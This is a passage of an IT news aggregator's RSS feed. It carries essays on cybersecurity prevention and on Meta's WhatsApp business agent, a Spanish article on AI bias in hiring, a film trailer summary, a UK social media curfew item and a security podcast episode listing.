<p class="wp-block-paragraph">Research shows that organizations have fewer high-impact breaches when they have mature identity governance, proactive patching and zero trust principles. Preventative maturity correlates with reduced incident severity and lower long-term costs. It doesn’t require perfection to be valuable.</p>



<p class="wp-block-paragraph">We think that security leaders, therefore, should reconsider how to define success. Reducing dwell time – the time an attacker is inside your systems – is important. Reducing entry points is fundamental. But when budgets favor post-compromise visibility over preventive architecture and governance, cybersecurity is not fulfilling its original mandate.</p>



<p class="wp-block-paragraph">AI will only amplify the imbalance, as capabilities that once required years of training can now be deployed quickly. Offensive toolkits are readily available.</p>



<h2 class="wp-block-heading">Achieving a better balance</h2>



<p class="wp-block-paragraph">We believe that scalable prevention architectures and capabilities present a better path forward than expanding analyst headcount.</p>



<p class="wp-block-paragraph">Cyber threats will accelerate and detection will remain essential. But our profession shouldn’t be defined by how efficiently we observe compromise. It should be defined by how effectively we reduce the likelihood of compromise in the first place.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK 16- and 17-year-olds to be encouraged to follow midnight social media curfew]]></title>
<description><![CDATA[Midnight to 6am block on some apps is latest stage of Labour’s bid to protect young people from online harmsSixteen and 17-year-olds are to be encouraged to observe a midnight social media curfew, in the latest stage of Labour’s bid “to protect the next generation” from online harms, including po...]]></description>
<link>https://tsecurity.de/de/3669921/it-nachrichten/uk-16-and-17-year-olds-to-be-encouraged-to-follow-midnight-social-media-curfew/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669921/it-nachrichten/uk-16-and-17-year-olds-to-be-encouraged-to-follow-midnight-social-media-curfew/</guid>
<pubDate>Wed, 15 Jul 2026 09:48:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Midnight to 6am block on some apps is latest stage of Labour’s bid to protect young people from online harms</p><p>Sixteen and 17-year-olds are to be encouraged to observe a midnight social media curfew, in the latest stage of Labour’s bid “to protect the next generation” from online harms, including poor sleep caused by night-time scrolling.</p><p>From next spring, Britain’s oldest children will be urged to refrain from using certain apps with a midnight to 6am block being switched on by default. But the curfew will not be mandatory and can be overridden. The move is an extension of the under-16 social media ban announced last month, which included restrictions on platforms such as Snapchat, TikTok, YouTube, Instagram, Facebook and X.</p> <a href="https://www.theguardian.com/technology/2026/jul/14/uk-16-17-year-olds-midnight-social-media-curfew">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Boardroom Conversations Shift to Surviving a Breach]]></title>
<description><![CDATA[This post doesn’t have text content, please click on the link below to view the original article. This article has been indexed from Blog Read the original article: Boardroom Conversations Shift to Surviving a Breach
Read more →
The post Boardroom Conversations Shift to Surviving a Breach appeare...]]></description>
<link>https://tsecurity.de/de/3669020/it-security-nachrichten/boardroom-conversations-shift-to-surviving-a-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669020/it-security-nachrichten/boardroom-conversations-shift-to-surviving-a-breach/</guid>
<pubDate>Tue, 14 Jul 2026 21:52:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This post doesn’t have text content, please click on the link below to view the original article. This article has been indexed from Blog Read the original article: Boardroom Conversations Shift to Surviving a Breach</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/boardroom-conversations-shift-to-surviving-a-breach/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/boardroom-conversations-shift-to-surviving-a-breach/">Boardroom Conversations Shift to Surviving a Breach</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Drops First Trailer for Ryan Reynolds’ Wild New Action-Comedy Mayday]]></title>
<description><![CDATA[Apple TV has released the first trailer for Mayday, an upcoming action-comedy movie starring Ryan Reynolds and Kenneth Branagh. The Cold War adventure sends Reynolds behind enemy lines, where his dangerous military mission quickly turns into an unexpected survival story filled with explosions, ch...]]></description>
<link>https://tsecurity.de/de/3668831/ios-mac-os/apple-tv-drops-first-trailer-for-ryan-reynolds-wild-new-action-comedy-mayday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668831/ios-mac-os/apple-tv-drops-first-trailer-for-ryan-reynolds-wild-new-action-comedy-mayday/</guid>
<pubDate>Tue, 14 Jul 2026 19:54:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has released the first trailer for Mayday, an upcoming action-comedy movie starring Ryan Reynolds and Kenneth Branagh. The Cold War adventure sends Reynolds behind enemy lines, where his dangerous military mission quickly turns into an unexpected survival story filled with explosions, chases and awkward humour.




https://www.youtube.com/watch?v=om5Un9X720M




The trailer introduces Reynolds as Lieutenant Troy “Assassin” Kelly, a confident US Navy pilot sent on a secret mission over Soviet territory. When his aircraft goes down, Troy becomes stranded in Russia with enemy forces searching for him. His only hope of survival comes from Nikolai Ustinov, a former KGB agent played by Branagh, who appears unusually fascinated by American culture.




Movie: Mayday



Release date: September 4, 2026



Streaming platform: Apple TV



Runtime: 1 hour and 51 minutes



Genre: Action, comedy, adventure and spy thriller



Directors: John Francis Daley and Jonathan Goldstein



Main cast: Ryan Reynolds, Kenneth Branagh, Maria Bakalova, Marcin Dorociński and David Morse




What Happens in the Mayday Trailer?



Minor trailer spoilers follow.



The Mayday trailer begins with Troy preparing for a classified operation during the height of the Cold War. His confidence suggests that he expects another successful mission, although the situation collapses after he enters Russian airspace and crash-lands in the wilderness.



Troy soon meets Nikolai, who decides to hide the American pilot instead of reporting him. Their first interactions establish the movie’s buddy-comedy style, with Troy struggling to understand whether his unlikely rescuer can genuinely be trusted.



Nikolai seems far more interested in American music, food and popular culture than Soviet politics. This creates several lighter moments as the two characters attempt to communicate while soldiers close in on their location.



The trailer also shows gunfights, military vehicles, snowy landscapes and several escape attempts. Troy still behaves like a fearless action hero, while Nikolai approaches danger with a calmer and less predictable attitude. Their different personalities appear to drive much of the comedy.



Where Is the Story Heading?



Troy and Nikolai will have to cross Soviet territory while avoiding soldiers, intelligence officers and anyone searching for the missing pilot. Their journey appears to grow into a larger escape mission as Nikolai risks his own safety to help Troy return home.



The central mystery involves Nikolai’s reasons for helping an American officer. His interest in Western culture offers one explanation, although the trailer suggests that he has personal reasons for turning against the people hunting Troy.



The movie also appears to build a genuine friendship between the two men. Troy begins the story as a self-assured pilot who expects to handle every problem alone, but surviving Russia requires him to trust someone he would normally consider an enemy.



John Francis Daley and Jonathan Goldstein wrote and directed Mayday. The filmmakers previously worked together on Game Night and Dungeons &amp; Dragons: Honor Among Thieves, which also combined action, character-based comedy and emotional storytelling.



FAQs



When does Mayday come out on Apple TV? Mayday premieres globally on Apple TV on Friday, September 4, 2026. The movie will arrive as a complete feature film, so viewers will not have to wait for weekly episodes.  Is Mayday a movie or a series? Mayday is a movie with a reported runtime of 111 minutes. It is currently planned as a standalone Apple Original Film rather than an episodic series.  Who does Ryan Reynolds play in Mayday? Ryan Reynolds plays Lieutenant Troy “Assassin” Kelly, a skilled US Navy pilot whose classified operation fails after he enters Soviet territory.  Who does Kenneth Branagh play? Kenneth Branagh plays Nikolai Ustinov, a former KGB agent who rescues Troy and helps him hide from Soviet forces.  Is Mayday based on a true story? Mayday is presented as an original fictional Cold War adventure. No official details describe the movie as a true story or an adaptation of real events.  Will Mayday receive a cinema release? The movie is currently scheduled to premiere directly on Apple TV. A wide theatrical release has not been announced.  



Mayday arrives on Apple TV on September 4, bringing together Ryan Reynolds and Kenneth Branagh for a Cold War escape story with action, humour and an unusual friendship at its centre.



Apple TV costs $12.99 per month in the US, with pricing varying across other regions. Are you planning to watch Mayday when it arrives? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Podcast: Boardroom Conversations Shift to Surviving a Breach]]></title>
<description><![CDATA[This post doesn’t have text content, please click on the link below to view the original article. This article has been indexed from Blog Read the original article: Podcast: Boardroom Conversations Shift to Surviving a Breach
Read more →
The post Podcast: Boardroom Conversations Shift to Survivin...]]></description>
<link>https://tsecurity.de/de/3668121/it-security-nachrichten/podcast-boardroom-conversations-shift-to-surviving-a-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668121/it-security-nachrichten/podcast-boardroom-conversations-shift-to-surviving-a-breach/</guid>
<pubDate>Tue, 14 Jul 2026 15:38:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This post doesn’t have text content, please click on the link below to view the original article. This article has been indexed from Blog Read the original article: Podcast: Boardroom Conversations Shift to Surviving a Breach</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/podcast-boardroom-conversations-shift-to-surviving-a-breach/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/podcast-boardroom-conversations-shift-to-surviving-a-breach/">Podcast: Boardroom Conversations Shift to Surviving a Breach</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Where Meta’s WhatsApp agent can actually win]]></title>
<description><![CDATA[Message a business on WhatsApp this week and you may be greeted by software. On June 3, Meta made its Business AI agent available to companies everywhere, a bot that answers questions, recommends products, books appointments, qualifies sales leads and hands you to a human when it gets stuck. It c...]]></description>
<link>https://tsecurity.de/de/3667537/it-security-nachrichten/where-metas-whatsapp-agent-can-actually-win/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667537/it-security-nachrichten/where-metas-whatsapp-agent-can-actually-win/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Message a business on WhatsApp this week and you may be greeted by software. On June 3, <a href="https://about.fb.com/news/2026/06/meta-business-agent/?utm_source=chatgpt.com">Meta made its Business AI agent available to companies everywhere</a>, a bot that answers questions, recommends products, books appointments, qualifies sales leads and hands you to a human when it gets stuck. It comes bundled in WhatsApp’s premium business tiers, and the largest companies pay for it by the token. After almost two years of testing in markets like India and Mexico, it is now live worldwide.</p>



<p class="wp-block-paragraph">I build AI agents for a living, and this is a good one. It also sits on top of the largest messaging network ever built. WhatsApp passed three billion monthly users last year. Mark Zuckerberg says people now hold more than a billion threads a day with business accounts across Meta’s apps. Paid messaging on WhatsApp crossed a <a href="https://techcrunch.com/2025/05/01/whatsapp-now-has-more-than-3-billion-users/?utm_source=chatgpt.com">two-billion-dollar annual run rate in the fourth quarter of 2025</a>, and click-to-WhatsApp ad revenue grew sixty percent year over year. Meta has spent a decade trying to turn all of that talking into buying, and the agent is its most capable attempt yet.</p>



<p class="wp-block-paragraph">So, picture the moment the agent finishes taking your order. What happens next?</p>



<h2 class="wp-block-heading"><a></a>The model Meta keeps pointing at</h2>



<p class="wp-block-paragraph">In Hangzhou or Shenzhen, the answer is that your order shows up, often within the hour. China fused messaging, payments and shopping into single apps more than a decade ago. WeChat carries roughly 1.4 billion users, an in-app store layer with hundreds of millions of monthly shoppers, and a wallet most of the country pays with. Korea built its own version, where KakaoTalk made chat the default way to send a gift. This is the world Meta gestures at when it imagines what WhatsApp could be.</p>



<p class="wp-block-paragraph">And yet WeChat, the purest “messaging app does commerce” story, is not actually China’s shopping champion, even though it arrived first and is still the bigger app. People do not open a messaging app to browse and shop. The buying went instead to Douyin, the Chinese app run by TikTok’s owner ByteDance, whose endless video feed is engineered to make you want things you were not looking for. WeChat had the users and the wallet, and it still lacked the two things that actually move commerce: A feed that creates demand and a way to deliver the goods. A chat window is neither.</p>



<h2 class="wp-block-heading"><a></a>The moat was never the storefront</h2>



<p class="wp-block-paragraph">Amazon learned the same lesson from the other side. Its moat was never the website. It was the warehouses, the trucks and the two-day promise (then one-day, then same-day) that rivals could not match. In 2025 <a href="https://www.freightwaves.com/news/amazon-overtakes-us-postal-service-as-largest-parcel-carrier?utm_source=chatgpt.com">Amazon passed the US Postal Service to become the largest parcel carrier in the country by volume, moving 6.7 billion packages</a>. Roughly 180 million Americans pay for Prime. The storefront is the part everyone sees; the fulfillment network is the part that wins.</p>



<p class="wp-block-paragraph">Asia’s commerce leaders made the same bet. Coupang built Korea’s Amazon by pouring billions into logistics: Order by midnight, and it arrives before 7 a.m., weekends included. Seven in ten Koreans now live within ten minutes of a Coupang warehouse. Even Alibaba, which grew up as an asset-light marketplace that owned no trucks, eventually concluded it had to build a logistics arm to keep pace.</p>



<p class="wp-block-paragraph">Speed sells, too. In China, McKinsey found, live shopping converts viewers into buyers at rates approaching 30 percent, roughly ten times an ordinary web page, because the fulfillment behind it delivers the impulse before it cools. The conversation creates the want, but the warehouse turns it into a sale.</p>



<h2 class="wp-block-heading"><a></a>Even where messaging rules</h2>



<p class="wp-block-paragraph">Korea shows what a messenger can and cannot win. KakaoTalk is the country’s WhatsApp, and it owns one kind of commerce completely: gifting. Koreans send presents straight from the chat window, close to 200 million of them in 2025, which is nearly all of the country’s mobile gifting. But notice what kind of commerce that is. A gift voucher or a coffee coupon needs no warehouse. The moment a purchase becomes a physical thing that has to arrive fast, the winner is no longer the messenger but Coupang and its dawn-delivery network. KakaoTalk owns the commerce that fits inside a message; Coupang owns the commerce that needs a truck.</p>



<p class="wp-block-paragraph">Japan makes the same point in the negative. LINE is about as dominant a messenger as exists anywhere, reaching 97 million people, close to 78 percent of the country. If messaging reach alone turned into commerce, LINE would own Japanese retail. Instead, it shut down its own payments service in 2025 and handed the wallet to a rival, while the actual shopping stayed with Rakuten and Amazon Japan. The most-used chat app in the country could not turn that reach into owning what people buy.</p>



<p class="wp-block-paragraph">Every market tells the same story: A chat app does not win physical commerce. Whoever owns the warehouse does.</p>



<h2 class="wp-block-heading"><a></a>What Meta is missing</h2>



<p class="wp-block-paragraph">Which brings us back to the WhatsApp agent, where Meta starts further ahead than WeChat ever did. Through Instagram and Reels it owns the demand-making feed WeChat never had, the agent gives it the sales conversation, and in the West, paying by card is universal. Only the last pillar is missing. Meta has no warehouses, no trucks, no delivery promise of its own and the few times it reached for the pieces around the sale, it pulled back: Its own wallet, Meta Pay, never became something people use, and in 2025 it wound down in-app checkout for Facebook and Instagram Shops, sending buyers back to merchants’ own sites to pay, ship and handle returns. Even Marketplace, its billion-user listings surface, mostly stays out of the transaction itself.</p>



<p class="wp-block-paragraph">And in the West, that last pillar is already spoken for. The West did fuse commerce, just not around chat. Amazon long ago combined the storefront, the payment, its own branded credit cards and the expensive part, the warehouses and the trucks, into one app that owns the American purchase from search to doorstep. That is the same kind of vertical integration China’s commerce giants built, with players like Alibaba and JD racing into a market where no Amazon yet stood in the way. In the US, that lane was filled years ago.</p>



<h2 class="wp-block-heading"><a></a>The other half</h2>



<p class="wp-block-paragraph">None of this makes the agent a mistake. It is already a booming ad business for Meta, and maybe that is all Meta wants it to be: Commerce’s front door, sending the shopper onward and billing the merchant for the introduction.</p>



<p class="wp-block-paragraph">But goods are only half of commerce, and the other half never needed a warehouse. Remember what KakaoTalk won: Gifting, the one kind of buying that ships nothing. Services are the same, only far bigger. A haircut, a dental cleaning, a training session, a plumber’s visit, a tutor’s hour: None of it sits in a fulfillment center. The transaction is a booking, not a box.</p>



<p class="wp-block-paragraph">And a booking is exactly what the agent is built to take. Look at the feature Meta put in its own announcement, right beside answering questions and recommending products: It books appointments. For a salon, a clinic or a one-person studio, that is a front desk. Give it the two pieces still missing, a calendar to hold the schedule and a way to take payment inside the chat, and WhatsApp stops being where those businesses message customers and becomes where they run the day.</p>



<p class="wp-block-paragraph">None of it needs a warehouse, and none of it is Amazon’s to defend. Does that put Meta on a collision course with Square and Mindbody?</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Pixel colors might rule this year]]></title>
<description><![CDATA[This year's Google Pixel 11 lineup might come in a bunch of funky colors. A series of now-deleted Amazon listings spotted by 9to5Google show what appear to be placeholders for Google's upcoming Pixel 11 in hot pink Fuchsia (Hibiscus), vibrant green Moss (Pistachio), and Midnight (Obsidian) black....]]></description>
<link>https://tsecurity.de/de/3666442/it-nachrichten/the-pixel-colors-might-rule-this-year/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666442/it-nachrichten/the-pixel-colors-might-rule-this-year/</guid>
<pubDate>Mon, 13 Jul 2026 23:03:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This year's Google Pixel 11 lineup might come in a bunch of funky colors. A series of now-deleted Amazon listings spotted by 9to5Google show what appear to be placeholders for Google's upcoming Pixel 11 in hot pink Fuchsia (Hibiscus), vibrant green Moss (Pistachio), and Midnight (Obsidian) black. We've seen two sets of names for the […]]]></content:encoded>
</item>
<item>
<title><![CDATA[El potencial de la IA para contaminar los procesos de selección con sesgos]]></title>
<description><![CDATA[Resulta difícil encontrar un área de la empresa moderna en la que la inteligencia artificial (IA) no haya encontrado aplicación, y los procesos de selección tecnológica no son una excepción. Una encuesta de MyPerfectResume revela que el 73% de los empleadores afirma utilizar IA en las decisiones ...]]></description>
<link>https://tsecurity.de/de/3664858/it-nachrichten/el-potencial-de-la-ia-para-contaminar-los-procesos-de-seleccin-con-sesgos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664858/it-nachrichten/el-potencial-de-la-ia-para-contaminar-los-procesos-de-seleccin-con-sesgos/</guid>
<pubDate>Mon, 13 Jul 2026 12:03:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Resulta difícil encontrar un área de la empresa moderna en la que la inteligencia artificial (IA) no haya encontrado aplicación, y los procesos de selección tecnológica no son una excepción. Una encuesta de MyPerfectResume revela que el 73% de los empleadores afirma utilizar IA en las decisiones de contratación, mientras que el 52% la emplea para decisiones relacionadas con la reestructuración organizativa y la planificación de puestos.</p>



<p>Por otro lado, los candidatos también recurren cada vez más a estas herramientas. Según datos de SAP, el 52% de las personas que buscan empleo actualmente utiliza IA para apoyar su proceso de búsqueda, principalmente para mejorar los materiales de candidatura (85%) y prepararse para entrevistas (73%).</p>



<p>Jasmine Escalera, experta en carreras profesionales de Zety, plataforma especializada en orientación laboral y creación de currículums, considera que “la tecnología puede ayudar a las empresas a ser más eficientes, pero las decisiones de contratación siguen beneficiándose del criterio humano, especialmente cuando la experiencia de un candidato requiere un contexto que los sistemas automatizados de evaluación no siempre son capaces de comprender”.</p>



<p>Está claro que la IA ya forma parte esencial del proceso de contratación. Por ello, las organizaciones deben definir una estrategia clara sobre cómo utilizarla en el futuro, abordando cuestiones como los sesgos en la selección, la transparencia y el equilibrio adecuado entre la intervención humana y la asistencia tecnológica.</p>



<h2 class="wp-block-heading">Identificar las señales de alerta</h2>



<p>La IA promete aportar eficiencia tanto a candidatos como a empleadores, pero una excesiva dependencia de la tecnología puede generar consecuencias no deseadas. Los datos de MyPerfectResume muestran además que el 65% de los encuestados considera que la IA rechaza automáticamente a candidatos antes de que una persona llegue a revisar sus solicitudes, mientras que un 14% afirma que la IA descarta de entrada a más de la mitad de los aspirantes.</p>



<p>Asimismo, el 47% cree que la tecnología ha dejado fuera del proceso a candidatos que, de otro modo, habrían avanzado en la selección. Además, el 51% asegura utilizar IA para identificar perfiles considerados de riesgo, como profesionales percibidos como <em>job hoppers</em> —personas con frecuentes cambios de empleo— o candidatos con interrupciones en su trayectoria laboral.</p>



<p>Según Escalera, marcar a determinados candidatos como riesgosos y descartarlos antes de que un reclutador revise su currículum puede excluir perfiles cuya experiencia profesional cuenta una historia más compleja de lo que un algoritmo está preparado para interpretar. Por ejemplo, quienes regresan al mercado laboral tras un periodo de ausencia pueden aportar capacidades valiosas que no encajan fácilmente en los criterios automatizados de evaluación.</p>



<p>También preocupa que la IA descarte a profesionales que desean cambiar de sector o que cuentan con cualificaciones que no se reflejan exactamente en el lenguaje utilizado en una oferta de empleo, impidiendo que un reclutador humano llegue siquiera a revisar su candidatura.</p>



<p>Laurie Cure, directora ejecutiva de la consultora Innovative Connections, afirma haber observado casos en los que la IA ha eliminado a candidatos altamente cualificados, pero más nerviosos durante las entrevistas, que necesitaban más tiempo del previsto por el sistema para responder a una pregunta. También señala situaciones en las que los aspirantes utilizan un lenguaje diferente al que la IA está programada para detectar, lo que impide que sean recomendados para continuar en el proceso.</p>



<p>Además, ha constatado escenarios en los que la IA utiliza datos históricos para identificar patrones asociados a empleados considerados exitosos, priorizando determinadas universidades, trayectorias profesionales, antigüedad o características similares. Aunque estos elementos no constituyen necesariamente un sesgo en sí mismos, pueden perpetuar la creencia de que existe una correlación directa entre dichos factores y el rendimiento profesional, algo que a menudo no se sostiene.</p>



<p>Por ello, añade Cure, es esencial que las personas sigan formando parte activa de estos procesos, aportando contexto, intuición, matices y la capacidad de detectar potencial en los candidatos, algo que la IA todavía no puede replicar.</p>



<p>Y dice: “Creo que estamos permitiendo que la IA se convierta en el proceso, cuando debería limitarse a apoyarlo para hacer que la contratación sea mejor”.</p>



<h2 class="wp-block-heading">Priorizar la precisión frente a la velocidad</h2>



<p>Para Cure, uno de los principales problemas es que muchas organizaciones han perdido el equilibrio adecuado. En lugar de utilizar la IA como complemento al trabajo humano, la emplean para realizar la mayor parte, o incluso la totalidad, del cribado curricular.</p>



<p>Las empresas que implementan IA únicamente para acelerar determinadas fases del proceso, sin valorar previamente si realmente aportará beneficios, corren el riesgo de introducir sesgos no deseados.</p>



<p>“Esto permite gestionar grandes volúmenes de candidaturas y aporta una mayor consistencia en la aplicación de los criterios de selección, pero probablemente deja fuera a muchos buenos candidatos”, señala, para añadir: “El componente humano debe desempeñar un papel muy activo en la definición de los requisitos de los puestos para evitar que sean excesivamente restrictivos. Las organizaciones deben prestar atención a cómo instruyen a la IA para realizar su trabajo y ser cautelosas al definir los criterios de evaluación y filtrado”.</p>



<p>En última instancia, la IA no es una herramienta que pueda implantarse y olvidarse, ni debería contemplarse únicamente como un mecanismo para ganar eficiencia, ya que muchos procesos continúan beneficiándose —e incluso dependen— del juicio humano.</p>



<p>Por ello, resulta fundamental realizar auditorías periódicas de los sistemas de IA utilizados en contratación y recordar que el uso de estas tecnologías no exime a las organizaciones de sus obligaciones legales y éticas en materia de igualdad de oportunidades laborales. Esto hace que el equilibrio entre intervención humana y automatización sea aún más relevante.</p>



<h2 class="wp-block-heading">Transparencia y confianza de los candidatos</h2>



<p>La irrupción de la IA también ha introducido un factor de desconfianza en los procesos de selección. Los empleadores no siempre tienen claro hasta qué punto los candidatos han recurrido a herramientas de IA, mientras que los aspirantes desconocen en muchos casos cómo se utiliza exactamente esta tecnología durante la contratación.</p>



<p>Los candidatos saben que las empresas están incorporando IA a sus procesos, pero a menudo desconocen el alcance de su utilización y en qué momento pueden esperar interactuar con una persona.</p>



<p>“Esa falta de claridad puede generar escepticismo y frustración, especialmente en un mercado laboral que ya resulta extremadamente competitivo”, explica Escalera. A su juicio, “el objetivo no debería ser convencer a los candidatos de que la IA no se utiliza, sino ayudarles a comprender cómo la tecnología sirve de apoyo a la toma de decisiones, en lugar de sustituir el criterio humano que hay detrás de ellas”.</p>



<p>Como recomendación, Cure propone que las organizaciones comiencen elaborando un mapa completo de su proceso de contratación, identificando cada una de sus fases. Esto permite visualizar con claridad dónde la IA aporta valor y en qué puntos sigue siendo necesaria la intervención humana.</p>



<p>Las empresas pueden acabar dependiendo excesivamente de la IA o, por el contrario, dedicar recursos humanos a tareas que podrían automatizarse y destinarse a actividades de mayor valor añadido.</p>



<p>“Las personas aportan una comprensión más amplia de la trayectoria profesional de un candidato y tienen la capacidad de detectar cuándo alguien posee el potencial necesario para evolucionar dentro de un puesto. También son capaces de interpretar trayectorias profesionales no convencionales y motivaciones personales con mayor precisión que la IA. Por su parte, la IA aporta consistencia, eficiencia, estandarización de criterios y un nivel de objetividad beneficioso para el proceso. Si logramos combinar eficazmente ambos elementos en los puntos adecuados, la contratación sale reforzada, no debilitada”, concluye Cure.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - John Pritchard, Cassie Christensen, Jaime Lewis-Gross, François Proulx, Kim Brown - ESW #467]]></title>
<description><![CDATA[Interview with François Proulx from Boost Security Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "L...]]></description>
<link>https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664752/it-security-nachrichten/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-john-pritchard-cassie-christensen-jaime-lewis-gross-franois-proulx-kim-brown-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:21:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with François Proulx from Boost Security</h3> <p><strong>Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation</strong></p> <p>Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".</p> <p>Segment Resources:</p> <ul> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://labs.boostsecurity.io/articles/introducing-smokedmeat">announcement</a></li> <li>Smoked Meat <a rel="noopener" target="_blank" href="https://github.com/boostsecurityio/smokedmeat">github</a></li> <li>Smoked <a rel="noopener" target="_blank" href="https://www.youtube.com/watch?v=F5Hr_201Au8">Meat demo</a> with Guillaume and François</li> </ul> <h3>Identiverse Interview with Dr. John Prichard from Radiant Logic</h3> <p><strong>The Three Identity Problem: Surviving Identity Security's Chaotic Era</strong></p> <p>Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.</p> <p>In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.</p> <p>To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at <a rel="noopener" target="_blank" href="https://securityweekly.com/radiantlogicidv">https://securityweekly.com/radiantlogicidv</a>.</p> <h3>Identiverse Interview with Cassie Christensen from Saviynt</h3> <p><strong>Everyone Wants an AI Assistant. Few Are Ready to Govern One</strong></p> <p>Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn't the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Jaime Lewis-Gross from Saviynt</h3> <p><strong>From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles</strong></p> <p>As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.</p> <p>This segment is sponsored by Saviynt. Learn more or get a free demo at <a rel="noopener" target="_blank" href="https://securityweekly.com/saviyntidv">https://securityweekly.com/saviyntidv</a></p> <h3>Identiverse Interview with Kim Brown from LexisNexis</h3> <p><strong>Stop Identity Fraud: Modern Strategies for Insurance and Healthcare</strong></p> <p>Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.</p> <p>This segment is sponsored by 